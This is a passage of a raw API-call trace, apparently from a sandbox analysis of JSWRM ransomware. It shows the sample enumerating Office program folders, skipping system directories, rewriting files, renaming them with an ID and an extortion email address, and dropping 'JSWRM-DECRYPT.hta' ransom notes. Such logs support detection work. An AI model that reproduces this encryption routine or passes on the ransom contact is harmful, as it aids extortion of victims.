hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x2660, lpOverlapped=0x0) returned 1 [0073.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0073.005] CloseHandle (hObject=0x458) returned 1 [0073.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0073.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0073.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0073.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0073.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0073.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.007] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x175, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AuthoredExtensions.xml", cAlternateFileName="AUTHOR~1.XML")) returned 1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2=".") returned 1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="..") returned 1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="...") returned 1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="windows") returned -1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="recovery") returned -1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="perflogs") returned -1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="documents and settings") returned -1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="$RECYCLE.BIN") returned 1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="system volume information") returned -1 [0073.007] lstrcmpiW (lpString1="AuthoredExtensions.xml", lpString2="msocache") returned -1 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AuthoredExtensions.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AuthoredExtensions.xml", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AuthoredExtensions.xml", lpUsedDefaultChar=0x0) returned 22 [0073.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AuthoredExtensions.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AuthoredExtensions.xml", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AuthoredExtensions.xml", lpUsedDefaultChar=0x0) returned 22 [0073.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0073.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0073.008] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=373) returned 1 [0073.008] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x170) returned 0x1ff448 [0073.008] ReadFile (in: hFile=0x458, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345ef6c*=0x170, lpOverlapped=0x0) returned 1 [0073.009] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.009] WriteFile (in: hFile=0x458, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345ef68*=0x170, lpOverlapped=0x0) returned 1 [0073.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0073.009] CloseHandle (hObject=0x458) returned 1 [0073.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0073.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0073.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0073.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.010] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.010] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21973808, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x21973808, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x21973808, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0073.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0073.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0073.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0073.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0073.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.011] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21973808, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x21973808, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x21973808, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0073.011] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0073.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0073.011] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2=".") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="..") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="...") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="windows") returned -1 [0073.011] lstrcmpiW (lpString1="root", lpString2="recovery") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="perflogs") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="documents and settings") returned 1 [0073.011] lstrcmpiW (lpString1="root", lpString2="$RECYCLE.BIN") returned 1 [0073.012] lstrcmpiW (lpString1="root", lpString2="system volume information") returned -1 [0073.012] lstrcmpiW (lpString1="root", lpString2="msocache") returned 1 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0073.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\jswrm-decrypt.hta")) returned 0xffffffff [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0073.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0073.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0073.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0073.013] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.013] WriteFile (in: hFile=0x454, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0073.014] CloseHandle (hObject=0x454) returned 1 [0073.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0073.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0073.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0073.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0073.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0073.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0073.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0073.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0073.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\jswrm-decrypt.hta")) returned 0x20 [0073.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0073.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0073.015] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x222d6c3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232200 [0073.015] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.015] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x222d6c3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0073.015] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.015] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.015] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2ca2e08, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="client", cAlternateFileName="")) returned 1 [0073.015] lstrcmpiW (lpString1="client", lpString2=".") returned 1 [0073.015] lstrcmpiW (lpString1="client", lpString2="..") returned 1 [0073.015] lstrcmpiW (lpString1="client", lpString2="...") returned 1 [0073.015] lstrcmpiW (lpString1="client", lpString2="windows") returned -1 [0073.015] lstrcmpiW (lpString1="client", lpString2="recovery") returned -1 [0073.015] lstrcmpiW (lpString1="client", lpString2="perflogs") returned -1 [0073.015] lstrcmpiW (lpString1="client", lpString2="documents and settings") returned -1 [0073.015] lstrcmpiW (lpString1="client", lpString2="$RECYCLE.BIN") returned 1 [0073.015] lstrcmpiW (lpString1="client", lpString2="system volume information") returned -1 [0073.015] lstrcmpiW (lpString1="client", lpString2="msocache") returned -1 [0073.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0073.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0073.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0073.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0073.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0073.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0073.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\client\\jswrm-decrypt.hta")) returned 0xffffffff [0073.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0073.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.017] 